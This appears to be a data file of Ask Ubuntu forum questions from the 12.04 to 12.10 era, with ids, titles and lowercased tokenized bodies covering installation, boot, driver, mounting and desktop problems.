214909	how do i install logkeys ?	i 'm very new to ubuntu and using 12.04 . i need help with logkeys and installing and the codes do n't respond . i get this after i try installing : could n't find package `` lkl '' . however , the following packages contain `` lkl '' in their name : sinhala-font-lklug fonts-lklug-sinhala ttf-sinhala-lklug could n't find package `` lkl '' . however , the following packages contain `` lkl '' in their name : sinhala-font-lklug fonts-lklug-sinhala ttf-sinhala-lklug no packages will be installed , upgraded , or removed . 0 packages upgraded , 0 newly installed , 0 to remove and 27 not upgraded . need to get 0 b of archives . after unpacking 0 b will be used . what should i do ?
214912	partitioning ssd +hdd	i recently bought an ssd drive 128 gb and i would like yo have your suggestions on partitiong and installing ubuntu 12.10 on it . first of all my drives are : hdd 640 gb ssd samsung 830 series 128 gb whats the best partitiong for theese drives ? 128 gb is sure enormous amount of space only for / ( root ) . is it a good choice if i make 2 partitions on ssd ( 20 gb / and 100 /home ) and leave hdd as backub drive for my data ( files , movies , music etc ) ? in this case what mount point must have hdd ? can you suggest me the best partitiong for my drives ?
214913	beep at resuming from suspend	since the upgrade from precise to quantal , the kernel beeps ( quite loud ) when waking from resume . is there a way to disable the beep ?
214921	is this tactic of switching from btrfs to ext4 safe ?	i 've been using btrfs on ubuntu 12.10 for both / and /home for several weeks . through out the time i 've come to the conclusion that ext4 performs better on my system and i 'd like to switch back however i 've found no easy way of converting both my btrfs partitions to ext4 . today i 've come up with an idea however i 'm not sure how safe it is : i 'm going to boot from a live environment and shrink my home partition . on the newly created space i 'm going to tar my / and /home , reformat the old partitions and finally untar back onto the new ext4 partitions and update grub . technically this should be safe however i 'm sure that there 's some quirk that needs to be done after the whole process which i 'm not aware of . how safe is the process described above and is there a better way of doing it ?
214925	set master mode on a realtek rtl8192ce	the supported interfaces of the network adapter include also ap . but when i try to set the card on master mode with iwconfig wlan0 mode master , i get the following error : error for wireless request `` set mode '' ( 8b06 ) : set failed on device wlan0 ; operation not permitted is it still possible with hostapd ? i tried to make it run with hostapd , but still no success . any suggestions ? i am trying to do this on ubuntu 12.04 .
214929	network manager connection is unmanageable until i disable and enable networking	ubuntu 12.10 . the problem is : i 've created dsl connection accessible for all users and made it to connect automatically . it works okay . the problem is , when i log in to my session , i can not control it . the only option network manager provides is to enable/disable network management . i ca n't connect or disconnect to that dsl connection , i ca n't enable my vpn connections . however , if i disable and then enable again network management , i see all options : both control for dsl and vpn connections . in all previous ubuntu versions i had no problem with this .
214937	mount problem on 12.10	i 've just done an online upgrade from 12.04 to 12.10 - seemed to have gone well , but now i can not access other drives ( partitions ) on my pc , also flash drives . i get the following error : unable to mount location - adding read acl for uid 1000 to media/malcolm failed : operation not supported . content of mount -l : /dev/sdb8 on / type ext2 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfsd-fuse on /run/user/malcolm/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=malcolm ) here 's some more system info ( fdisk ) $ cat /etc/fstab # /etc/fstab : static file system information . # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 /dev/sdb8 / ext2 errors=remount-ro 0 1 # swap was on /dev/sdb1 during installation uuid=2bafe271-cb66-41ae-a4e4-831fa3b85fbe none swap sw 0 0 # swap was on /dev/sdb9 during installation uuid=1f1e2de9-4983-4105-8a64-c8da5382ca2d none swap sw 0 0
214938	usb ntfs pen drive and hard drive not working after plugging them into ubuntu	i connected a usb key ( ntfs formatted ) with data in it , on 12.04 , after i disconnected it , i was no longer able to access the usb key neither from windows nor from ubuntu . the system asks me to format my usb key . just now i connected a hard drive ntfs formatted with data in it to 12.04 . i ejected correctly the hard drive and connected it to windows , and the system asks me to format my hard drive , same as the usb key . can someone help me please ?
214941	how to drag widgets from monitor to monitor in kubuntu ?	i have kubuntu 12.04 on my dell inspiron . i use an extern monitor as my default one , and my laptop monitor as my second monitor . i can place widgets on the extern ( default ) screen , but when i drag them to the laptop ( second ) screen , they disappear . i can put widgets on the second screen , if i open the widget menu on that screen , but i ca n't drag them to my first monitor . how can i switch between monitors for the widgets ?
214943	differences between `` apache '' 's installations	are there any differences between installing apache httpd using sudo apt-get install apache2 ( as the guide of ubuntu says - https : //help.ubuntu.com/12.04/serverguide/httpd.html ) or following the steps on the apache documentation ( http : //httpd.apache.org/docs/2.4/install.html # overview ) ? i tried both ways ; in the first case ( using apt-get ) the server seems to work - i open a browser page and i got it . in the second case i need other packages ( apr , apr-util and pcre ) and so i abandoned the attempt .
214946	wifi no longer working for no apparent reason ... ..on 12.04	since today , my wifi led is off , i can not enable it and it seems that the os can not detect the wifi card at all . it 's like it has disappeared ! i tried bios default reset- did n't work i did n't update anything ... . do you have any idea to help me ? thanks in advance
214947	which version of ubuntu is recommended for app developers ?	i 've searched around ask ubuntu and the app developer site , but i ca n't seem to find the answers to my questions . i 'm wanting to get back into programming , and i 'd eventually like get into app development for ubuntu , but i 'm not sure where to get started . which version of ubuntu is currently recommended for app development , especially for those wanting to publish their apps to the software centre ? should app developers use the current lts release , or , can any of the new releases be used ? should developers use the 32-bit or 64-bit edition of ubuntu , or does this not matter ? what effect would the above choices have on the eventual publication of an app ?
214950	how can i remove fonts that i never use , from libreoffice and linux in general ?	there are a lot of extra fonts that all seem to look alike and just annoy me in the drop down list . is there anyway i can erase them from the system ?
214953	12.10 screen resolution on acer aspire s3	i 'm new to linux and recently installed 12.10 alongside windows on my laptop . initially 3d screen effects ( i.e. , docky ) were not working and i tried different things like installing and reinstalling nvidia-current , compiz , etc ... now , i think i messed up the display drivers completely . although all the effects are now working , i ca n't get any screen resolution other than 640x480 . can anyone please tell me how to find out exactly what 's wrong and ways of fixing it ?
214970	having monday as the first day of the week	my locale setting for lc_time is set to swedish but despite this cal displays sunday instead of monday as the first day of the week . any clues ? $ locale lang=sv_se.utf-8 language=en_us : en lc_ctype=en_us.utf-8 lc_numeric= '' sv_se.utf-8 '' lc_time= '' sv_se.utf-8 '' lc_collate=en_us.utf-8 lc_monetary= '' sv_se.utf-8 '' lc_messages=en_us.utf-8 lc_paper= '' sv_se.utf-8 '' lc_name= '' sv_se.utf-8 '' lc_address= '' sv_se.utf-8 '' lc_telephone= '' sv_se.utf-8 '' lc_measurement= '' sv_se.utf-8 '' lc_identification= '' sv_se.utf-8 '' lc_all= $ grep first_weekday /usr/share/i18n/locales/sv_se first_weekday 2 $ cal november 2012 sรถ mรฅ ti on to fr lรถ 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30
214972	grub does not autoboot the default option after upgrade to 12.10	i recently upgraded ubuntu from 12.04 to 12.10 and since that time , the system does not automatically boot . it always opens the boot menu , and i have to press enter to make it boot ubuntu . it seems to be ignoring the timeout value , and using a 'neverending ' timeout . there are no other systems ( no dual boot ) , only the options originally installed by default ubuntu 12.04 installation . my /etc/default/grub has only these effective options : grub_default='ubuntu' grub_hidden_timeout=1 grub_hidden_timeout_quiet=true grub_timeout=1 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' grub_terminal=console i experimented with grub_default , giving it values '0 ' , '1 ' , 'ubuntu ' but nothing helps . yes i always run update-grub afterwards . how can i make the system booting again ?
214973	how to fix grub on dualboot with windows7 and ubuntu ?	i am a relatively recent user of linux . i had several releases of ubuntu installed on my laptop working in dual-boot and never had any issues . recently , i installed opensuse because i thought it would be necessary for an assignment at my university . it turns out it was n't so i returned to ubuntu and decided to burn the new .iso to a cd and install it . the problem is that during installation process i almost for sure messed up with the partitions and now , whenever i tried to load windows 7 , it will tells me that a required device is inaccessible . so , i reinstalled ubuntu again and now all i get is that i am redirected to the grub menu without any warnings . i tried creating a windows recovery disk but it gives me unexpected i/o error . i suspect it is because it was downloaded from the internet and maybe some files were n't there . i tried everything without success , so i decided to ask here , in the hope i can receive some help and also learn how to help others with it in the future . here it is my boot info summary : http : //paste.ubuntu.com/1344990/ also , i might add , that on the boot-repair advanced options , the box repair windows boot files is `` locked '' , so i ca n't check it . edit : apparentely , the box is locked , because , from what i understood after reading the boot-repair information , everything is fine with my windows boot-files ... i still need some guidance though
214974	removing lens from ubuntu 12.10	i would like to remove lens from ubuntu 's unity environment . you might argue that i can go back to ubuntu-gnome classic . but i would like to retain global menu feature of ubuntu . please help . thanks in advance .
214977	how can i find out webcam resolution ?	i have a webcamera on my t500 thinkpad . i would like to know its resolution . is there a way to find it out through software and not referring to documentation ( that i do not have on me ) .
214980	unable to install gnome boxes	i ca n't install gnome boxes : $ sudo apt-get install gnome-boxes reading package lists ... done building dependency tree reading state information ... done package gnome-boxes is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'gnome-boxes ' has no installation candidate i tried to compile gnome boxes : $ ./configure checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... gawk checking whether make sets $ ( make ) ... yes checking how to create a ustar tar archive ... gnutar checking whether to enable maintainer-specific portions of makefiles ... yes checking whether make supports nested variables ... yes checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes [ ... ] checking for pkg-config ... /usr/bin/pkg-config checking pkg-config is at least version 0.22 ... yes checking whether nls is requested ... yes checking for intltool > = 0.40.0 ... 0.50.2 found checking for intltool-update ... /usr/bin/intltool-update checking for intltool-merge ... /usr/bin/intltool-merge checking for intltool-extract ... /usr/bin/intltool-extract checking for xgettext ... /usr/bin/xgettext checking for msgmerge ... /usr/bin/msgmerge checking for msgfmt ... /usr/bin/msgfmt checking for gmsgfmt ... /usr/bin/msgfmt checking for perl ... /usr/bin/perl checking for perl > = 5.8.1 ... 5.14.2 checking for xml : :parser ... ok checking for gobject-introspection ... configure : error : gobject-introspection-1.0 is not installed but gobject-introspection is already installed : $ sudo apt-get install gobject-introspection reading package lists ... done building dependency tree reading state information ... done gobject-introspection is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . why am i unable to install gnome boxes ?
214984	is it possible to turn off integrated gpu in laptops with an optimus card ?	good morning . i have alienware m14x with nvidia optimus gt555m . i would like to be able to have my laptop screen and external hdmi screen both working . is there any way i can do it ? i would prefer to turn off the integrated gpu completely and just let the pc to run on the nvidia if possible , but i ca n't find a solution for that . thank you for any tips
214986	gotomeeting webinar	is there a way to participate in a gotomeeting webinnar with ubuntu 12.04 ? this are the system requirements : internet connection windows 7 , vista , 2003 server or xp mac os x v10.5 leopard or newer ipad 1 or newer , iphone 3gs or newer , ipod touch ( 3rd generation ) or newer with mac ios v4.2 or newer , android 2.2 or newer internet explorer 7.0 or newer , firefox 4.0 or newer , safari 3.0 or newer or chrome 5.0 or newer thanks
214991	safemode how long should it take clean and free up space	i now have a window that reads : continuing will remount your / fillesystem in read/write mode and mount any other filesystem defined in /ect/fstab . do you wish to continue ? i replied yes and now i have under it : fsck from util-linux 2.20.1 /dev/sda : clean 318818/10117120 files , 24047888/40467456 blocks . it been like this for 3 hours how should it take ?
214992	old grub need to be restored ?	i 'm dual booting precise with windows and wan na make the switch to quantal , should i set the bootloader again ?
214995	decrypting ~/.private/ folder	okay , so i just realised that my ~/.private/ folder is huge ( 22gb ) and that my ~/private folder is empty . i tried decrypting the folder with sudo ecryptfs-mount-private , i entered my passphrase correctly and got the following error : inserted auth tok with sig [ removed ] into the user session keyring fopen : no such file or directory keyctl_search : success perhaps try the interactive 'ecryptfs-mount-private' ecryptfs-mount-private without sudo simply returns without echoing anything . any idea what might be wrong ? i really do n't need this home encryption if it 's gon na take up so much space . so , my questions are : how do i decrypt/unencrypt the contents of ~/.private/ ? how do i stop stuff from being encrypted ? as far as i 've understood it everything in ~/private/ gets encrypted , but i have n't moved anything to that folder and it did n't exist before i created it . my problems are very similar to this question : why is the size of my .private folder so large ?
215001	quickly switch documentation	does anyone know where i can find documentation on the switch widget on glade ? ? i tried finding on the gtk website , but it does n't have an entry for it . edit thank you to timo for pointing me in the right direction . i am loving askubuntu ! . basically my problem was that the connect function by defualts pushes the window 's object , the widget 's object and the active state to whichever function you run on the callback . this is the before : self.daymon.connect ( `` notify : :active '' , self.toggle_day ( `` mon '' ) ) and this is the after : self.daymon.connect ( 'notify : :active ' , self.toggle_day , `` mon '' ) the latter works like a charm when running the following function : def toggle_day ( self , widget , active , day ) : if widget.get_active ( ) : state = true else : state = false full code to follow should you be interested : # -*- mode : python ; coding : utf-8 ; indent-tabs-mode : nil ; tab-width : 4 -*- # # # begin license # this file is in the public domain # # # end license import gettext from gettext import gettext as _ gettext.textdomain ( 'snooze ' ) from gi.repository import gtk # pylint : disable=e0611 import logging logger = logging.getlogger ( 'snooze ' ) import configparser , os # we need to be able to store and recal settings from snooze_lib import window from snooze.aboutsnoozedialog import aboutsnoozedialog from snooze.preferencessnoozedialog import preferencessnoozedialog # first try to read the config.cfg file config = configparser.rawconfigparser ( ) configfile = 'data/config.cfg' monstate = false tuestate = false wedstate = false thurstate = false fristate = false satstate = false sunstate = false # creating the config file def createconfigfile ( filename ) : print `` creating config '' config.add_section ( 'preferences ' ) config.set ( 'preferences ' , 'mon ' , false ) config.set ( 'preferences ' , 'tues ' , false ) config.set ( 'preferences ' , 'wed ' , false ) config.set ( 'preferences ' , 'thur ' , false ) config.set ( 'preferences ' , 'fri ' , false ) config.set ( 'preferences ' , 'sat ' , false ) config.set ( 'preferences ' , 'sun ' , false ) rewriteconfigfile ( filename ) # writing our configuration file to the failename as specifeid def rewriteconfigfile ( filename ) : with open ( filename , 'wb ' ) as configfile : config.write ( configfile ) # reading the config file def readconfigfile ( filename ) : print `` reading config '' global monstate , tuestate , wedstate , thurstate , fristate , satstate , sunstate monstate = config.getboolean ( 'preferences ' , 'mon ' ) tuestate = config.getboolean ( 'preferences ' , 'tues ' ) wedstate = config.getboolean ( 'preferences ' , 'wed ' ) thurstate = config.getboolean ( 'preferences ' , 'thur ' ) fristate = config.getboolean ( 'preferences ' , 'fri ' ) satstate = config.getboolean ( 'preferences ' , 'sat ' ) sunstate = config.getboolean ( 'preferences ' , 'sun ' ) # if the config does not exist , create it then read it . otherwise read it if not config.read ( configfile ) : createconfigfile ( configfile ) readconfigfile ( configfile ) else : readconfigfile ( configfile ) # see snooze_lib.window.py for more details about how this class works class snoozewindow ( window ) : __gtype_name__ = `` snoozewindow '' def finish_initializing ( self , builder ) : # pylint : disable=e1002 `` '' '' set up the main window '' '' '' super ( snoozewindow , self ) .finish_initializing ( builder ) self.aboutdialog = aboutsnoozedialog self.preferencesdialog = preferencessnoozedialog # code for other initialization actions should be added here . self.daymon = self.builder.get_object ( `` daymon '' ) self.daytues = self.builder.get_object ( `` daytues '' ) self.daywed = self.builder.get_object ( `` daywed '' ) self.daythur = self.builder.get_object ( `` daythur '' ) self.dayfri = self.builder.get_object ( `` dayfri '' ) self.daysat = self.builder.get_object ( `` daysat '' ) self.daysun = self.builder.get_object ( `` daysun '' ) # set the values based on the config file if monstate == true : self.daymon.activate ( ) if tuestate == true : self.daytues.activate ( ) if wedstate == true : self.daywed.activate ( ) if thurstate == true : self.daythur.activate ( ) if fristate == true : self.dayfri.activate ( ) if satstate == true : self.daysat.activate ( ) if sunstate == true : self.daysun.activate ( ) self.daymon.connect ( 'notify : :active ' , self.toggle_day , `` mon '' ) self.daytues.connect ( 'notify : :active ' , self.toggle_day , `` tues '' ) self.daywed.connect ( 'notify : :active ' , self.toggle_day , `` wed '' ) self.daythur.connect ( 'notify : :active ' , self.toggle_day , `` thur '' ) self.dayfri.connect ( 'notify : :active ' , self.toggle_day , `` fri '' ) self.daysat.connect ( 'notify : :active ' , self.toggle_day , `` sat '' ) self.daysun.connect ( 'notify : :active ' , self.toggle_day , `` sun '' ) # toggle the setting and store the information in the config file def toggle_day ( self , widget , active , day ) : if widget.get_active ( ) : state = true else : state = false # set the config option and update the config file global configfile config.set ( 'preferences ' , day , state ) rewriteconfigfile ( configfile )
215013	unable to mount media hard drivrs . after [ user @ machine ~ ] $ sudo usermod -g dialout user	i was n't able to download date from my usb cradle from a powertap cycling computer after upgrading to 12.10 . i thought i found the answer with a google search that suggested using this code where user is my username . unfortunately now my media hard drives wo n't mount . i am the only user of this computer and should have superuser privileges . when i try to mount the hard drives i am asked for a password but my password does n't work . it also wo n't let me take a screenshot . action : org.freedesktop.udisk2.filesystem-mount-system . fwiw the cradle is downloading fine but it looks like the code removed or changed my superuser password
215016	unity does n't appear after installing nvidia drivers	i 've just installed 12.10 from scratch . unity also started okay , but in a poor resolution . i found a setting ( i think it was in `` software sources '' ) to change the display driver to nvidia , and then i rebooted . when ubuntu now starts , it goes to the desktop ( i see a file that i saved to the desktop ) but there are no other screen elements -- no unity , no menu bar at the top , no window decoration , nothing . ctrl-alt-t and ctrl-alt-f2 work as they should , but it 's kinda limiting ... how can i restore the default driver ? i guess i need a way to open those `` software sources '' settings again - or anything else that could fix it ! i hope i do n't have to type all this by hand . how can i install a proper nvidia driver so that i can get up to 1280x1024 ? my old tricks do n't seem to work , but perhaps they might if i solve # 1 ...
215026	x : conditional xorg.conf file during startup	i 've got a computer which i use at a couple of different sites , and i 've got differen monitors at those sites . what i 've done is that i 've ceated different xorg.conf files for each of these sites . now , i 've created a script which queries the nvidia driver for connected monitors , and based on those i apply the right xorg.conf file . however , i 'd like this process to take place automatically during startup . however , i ca n't really get things to work . i 've been trying with upstart , and created the following monitors.conf file in /etc/init : description `` configure monitors '' start on starting gdm task setuid root exec /etc/x11/monitors.sh i 've read that start on starting gdm is the right way to run a script just before x11 is about to start . i need to run the script just before x11 to have x11 to pick up the right x11 .conf file . however , nothing really happens ?
215027	volume keys not working after upgrade to quantal , but work from mc remote	all keys worked perfectly in precise . after upgrading to quantal , multimedia keys on my usb keyboard no longer work ( volume keys , play , next , prev ) . weird thing is that i 've also got a cheap mc remote ( which shows up as an usb keyboard ) , and it works ok. any hints ?
215032	dual booting windows 7 and ubuntu 12.10 on uefi laptop	i have a notebook pre-installed with windows7 and i installed ubuntu 12.10 on it following the standard installation steps in the installation image . the only problem is that on reboot the machine continues to boot windows ignoring the presence of ubuntu ( grub never comes up ) . my partition scheme is this sda1 : ntfs 612mb sda2 : ntfs 50gb ( after resizing during ubuntu installation . this is the main windows partition ) sda4 : extended sda5 : ext4 /boot sda6 : btrfs / i have tried boot-repair and it did n't help . tried refind boot manager but it does n't support ntfs partitions . i do n't know what else to try . my next attempt is to try to install grub by hand to the mbr . any other ideas ?
215033	is there a way to make the speaker silent while the headphone-jack keeps working ? 12.04lts	the pc i am working on is in a loud environment . if i need sound , i use the headphone . on my own account this is easy : i mute the speaker in the sound-setting . i am not the only user , others use the guest-session . and that 's what this question about : is it possible to turn off the speaker by default on a guest-session and leave the headphone-output working ? if yes , how can i fix it ? i tried to loosen the speaker ( hardware ) connection but it is soldered to the mainboard . the soundcard on the pc is : hda intel at 0xfea78000 irq 44 /proc/asound/pcm ───────────────────────────┐ │00-00 : alc662 rev1 analog : alc662 rev1 analog : playback 1 : capture 1│ │00-02 : alc662 rev1 analog : alc662 rev1 analog : capture 1 ubuntu 12.04lts is running on the system , my account has all the ( admin ) rights
215035	how can i see that bumblebee has disabled nvidia ?	im trying to find out how to see if bumblebee which i installed on my 12.10 installation on my k55vd asus laptop ... how can know for sure that bumblebee is turning the nvidia off ?
215044	`` virtual machine manager '' and `` virtual machine server '' setup manual	is there a manual available that covers the proper setup of a `` virtual machine server '' with no gui with an ubuntu workstation with a gui and `` virtual machine manager '' installed ? both are 12.04 version . i get the following error message : unable to connect to libvirt verify that -the libvirt-bin package is installed -the libvirt daemon has been started -you are a member of the libvirtd group the package is installed for some reason starting the daemon seems to crash libvirtd start info : libvirt version 0.9.8 error : virexecwithhook:328 : can not find 'pm-is-supported ' in path : no such file or directory also qemucapsinit:856 : failed to get host power management capabilities so i guess i did not set the server up correctly . all manuals i found do not mention `` virtual machine manager '' . i only chose the packages to connect with ssh remotely and the `` virtual machine server '' for the server installation . so i would like to find a manual that covers this combo or then covered only gui machines that have both on the same machine , which will not really help with system performance as a hypervisor .
215046	unable to connect to wireless network	the following is the info from the command . i hope it helps . thanks , mike 00:00.0 host bridge [ 0600 ] : intel corporation mobile pm965/gm965/gl960 memory controller hub [ 8086:2a00 ] ( rev 0c ) 00:01.0 pci bridge [ 0604 ] : intel corporation mobile pm965/gm965/gl960 pci express root port [ 8086:2a01 ] ( rev 0c ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb uhci controller # 4 [ 8086:2834 ] ( rev 02 ) 00:1a.1 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb uhci controller # 5 [ 8086:2835 ] ( rev 02 ) 00:1a.7 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 2 [ 8086:283a ] ( rev 02 ) 00:1b.0 audio device [ 0403 ] : intel corporation 82801h ( ich8 family ) hd audio controller [ 8086:284b ] ( rev 02 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 82801h ( ich8 family ) pci express port 1 [ 8086:283f ] ( rev 02 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation 82801h ( ich8 family ) pci express port 2 [ 8086:2841 ] ( rev 02 ) 00:1c.5 pci bridge [ 0604 ] : intel corporation 82801h ( ich8 family ) pci express port 6 [ 8086:2849 ] ( rev 02 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb uhci controller # 1 [ 8086:2830 ] ( rev 02 ) 00:1d.1 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb uhci controller # 2 [ 8086:2831 ] ( rev 02 ) 00:1d.2 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb uhci controller # 3 [ 8086:2832 ] ( rev 02 ) 00:1d.7 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 1 [ 8086:2836 ] ( rev 02 ) 00:1e.0 pci bridge [ 0604 ] : intel corporation 82801 mobile pci bridge [ 8086:2448 ] ( rev f2 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation 82801hm ( ich8m ) lpc interface controller [ 8086:2815 ] ( rev 02 ) 00:1f.1 ide interface [ 0101 ] : intel corporation 82801hm/hem ( ich8m/ich8m-e ) ide controller [ 8086:2850 ] ( rev 02 ) 00:1f.2 ide interface [ 0101 ] : intel corporation 82801hm/hem ( ich8m/ich8m-e ) sata controller [ ide mode ] [ 8086:2828 ] ( rev 02 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 82801h ( ich8 family ) smbus controller [ 8086:283e ] ( rev 02 ) 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation g86m [ quadro nvs 135m ] [ 10de:042b ] ( rev a1 ) 03:01.0 cardbus bridge [ 0607 ] : o2 micro , inc. cardbus bridge [ 1217:7135 ] ( rev 21 ) 03:01.4 firewire ( ieee 1394 ) [ 0c00 ] : o2 micro , inc. firewire ( ieee 1394 ) [ 1217:00f7 ] ( rev 02 ) 09:00.0 ethernet controller [ 0200 ] : broadcom corporation netxtreme bcm5755m gigabit ethernet pci express [ 14e4:1673 ] ( rev 02 ) 0c:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11a/b/g [ 14e4:4312 ] ( rev 01 )
215047	can i configure notification period of webapps ?	webapps set the communication icon on blue when there are new tweets , messages , etc . is there a way to configure every how many minutes this is refreshed ?
215051	front usb wont mount harddrives , internal usb ports do	i have noticed something in my new build , i am using ubuntu desktop newest version my motherboard is the asus f1a75-m pro r2.0 with the usb ports in the back all my ntfs hard disks or usb sticks work fine , but then.. when i put them in the front usb ports of my chassis ( silverstone milo ml-03 ) they wont mount ... i have 2 usb 3.0 ports in front of the case connected with a internal usb 3.0 header . but i verified that the usb 3.0 ports on the back do mount the harddisk so it has nothing to do with usb 3.0 i think . the strange thing is , my mouse works fine on the front usb ports . every usb hardware piece seems to work except if it has any memory inside it : ( what seems to be the problem ?
215052	lightread not syncing with google reader	i have installed lightread from the ubuntu 12.04 repository . initially is used for work properly , but later as the number of unread posts increased the total number of unread posts in google.com/reader was not matching with the count in the lightread . what could be the reason for this ? i did sync in the lightread a couple of times , but it did n't make any difference .
215053	why does additional driver tab not have an nvidia driver to install ?	i 've just installed ubuntu 12.10 . in the `` additional driver '' tab of `` software source '' window does not have nvidia driver installation , it has nothing ? ( my computer has the geforce gt540 cuda )
215054	bash profile works for user but not sudo	i 've modified my .profile to include a folder if a flash drive is plugged in . when running the command as the user it works fine but tells me the scrip must be run by sudo ( this is what i want ) . however , when i try to run it with sudo i get `` command not found '' i have a symlink ( flash ) in my /var/www folder pointing to my /media/flash drive . ( nevermind this setup since is just for dev ) this is my user 's .profile : # set path so it includes flash scripts if [ -d `` /var/www/flash/scripts '' ] ; then path= '' /var/www/flash/scripts : $ path '' fi when trying to run as sudo i get : sudo : script : command not found any ideas ?
215058	does the nexus 7 version of ubuntu support the same software as the desktop version ?	i 'm wondering whether the nexus 7 version of ubuntu ( 'ubuntu on android ' ) supports the same software ( i. e. , virtualbox , google chrome , libreoffice writer ) as the desktop version . is there any difference between the nexus version and the android version in terms of software support ?
215065	ca n't find my ubuntu partition after laptop crashed	my laptop crashed last week and as a first step , i reinstalled the hatefulness that is windows 7 . now i ca n't see my ubuntu partition but when i try to install the new version of ubuntu , i get a message asking if i want to uninstall . this suggests to me that my ubuntu partition is hiding somewhere ! can anyone help please ? i ca n't be absolutely certain as i 've been using ubuntu for a while now but i think i had version 11.10 running .
215067	kernel panic - not able to boot into recovery too	i installed additional drivers for ati and ubuntu tweak and after some time , i shutdown the laptop and after that , when i tried to turn it on it gives me kernel panic . i am not able to boot into recovery mode . looks like ubuntu tweak did something . here is a screenshot of the error i got from recovery console :
215068	gtk problem in ubuntu 12.04	i installed ubuntu 12.04 64-bit i have python 2.7 with some additional packages . when i try to use simple command in python like for example help ( 'modules ' ) i have an error and python terminates . > > > help ( 'modules ' ) please wait a moment while i gather a list of all available modules ... /usr/lib/python2.7/dist-packages/gobject/constants.py:24 : warning : g_boxed_type_register_static : assertion `g_type_from_name ( name ) == 0 ' failed import gobject._gobject /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:40 : warning : g_boxed_type_register_static : assertion `g_type_from_name ( name ) == 0 ' failed from gtk import _gtk ** ( python:2729 ) : critical ** : pyg_register_boxed : assertion `boxed_type ! = 0 ' failed /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:40 : warning : can not register existing type `gdkdevice' from gtk import _gtk /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:40 : warning : g_type_get_qdata : assertion `node ! = null ' failed from gtk import _gtk segmentation fault ( core dumped ) in addition i can not install matplotlib . in a long error log , apart of other stuff i have : pkg-config : looking for pygtk-2.0 gtk+-2.0 * package pygtk-2.0 was not found in the pkg-config * search path . perhaps you should add the directory * containing `pygtk-2.0.pc ' to the pkg_config_path * environment variable no package 'pygtk-2.0 ' found * package gtk+-2.0 was not found in the pkg-config * search path . perhaps you should add the directory * containing `gtk+-2.0.pc ' to the pkg_config_path * environment variable no package 'gtk+-2.0 ' found * you may need to install 'dev ' package ( s ) to * provide header files . gtk+ : no * could not find gtk+ headers in any of * '/usr/local/include ' , '/usr/include ' , * '/usr/local/include ' , '/usr/include ' , ' . ' i tried to install gtk from synaptic but did not find exact match for gtk and installed libraries with its dependencies which i thought are the closest . i am not sure how to test if i have it correctly installed and how to fix my python 's problem
215070	installing software without ubuntu software center	i have a file downloaded from the internet . to be specific i downloaded code : :blocks from its official site . the file name is codeblocks.tar.bz2 . if i do n't have internet connection and also ubuntu software center is not working , how do i install the software ? i think i will have to use terminal but i am not used to with terminal . so please make it as simple as possible .
215072	ca n't startup as login screen requests a name and password - but i have not set one up yet ?	i am trying ubuntu on an xp machine . downloaded burnt to dvd - all good , rebooted and ubuntu started from dvd . i clicked try and it then came up with a login . what name and password do i use the first time ?
215076	finding out what takes up so much space ( encryption related )	so i just followed this guide to remove my home encryption : http : //pastebin.com/ntnlbfcr but apparently there is something on my partition that takes up about 22gb of space ( which is the same amount that the encryption folder did ) and i ca n't for my life find out how to delete it . i 've backed up my home folder in another hdd . here 's a screenshot of what i mean : http : //i.imgur.com/wh0yl.png help is incredibly appreciated , i 'm frankly stumped . so , in short : apparently something takes up space on my partition without it showing up in the / folder or any of its subfolders , how can i find it and delete it ?
215080	latex does n't work after upgrade to 12.10	i just updated to ubuntu 12.10 but now latex does n't work any more . kile always asks me `` did you run latex ? '' . i 'm quite new in this stuff , so it seems a bit strange for me , because in 12.04 it worked always without any exception . i also tried it with other editors , but there were similar mistakes , so i guess it is related to the upgrade . perhaps anybody of you has a hint .
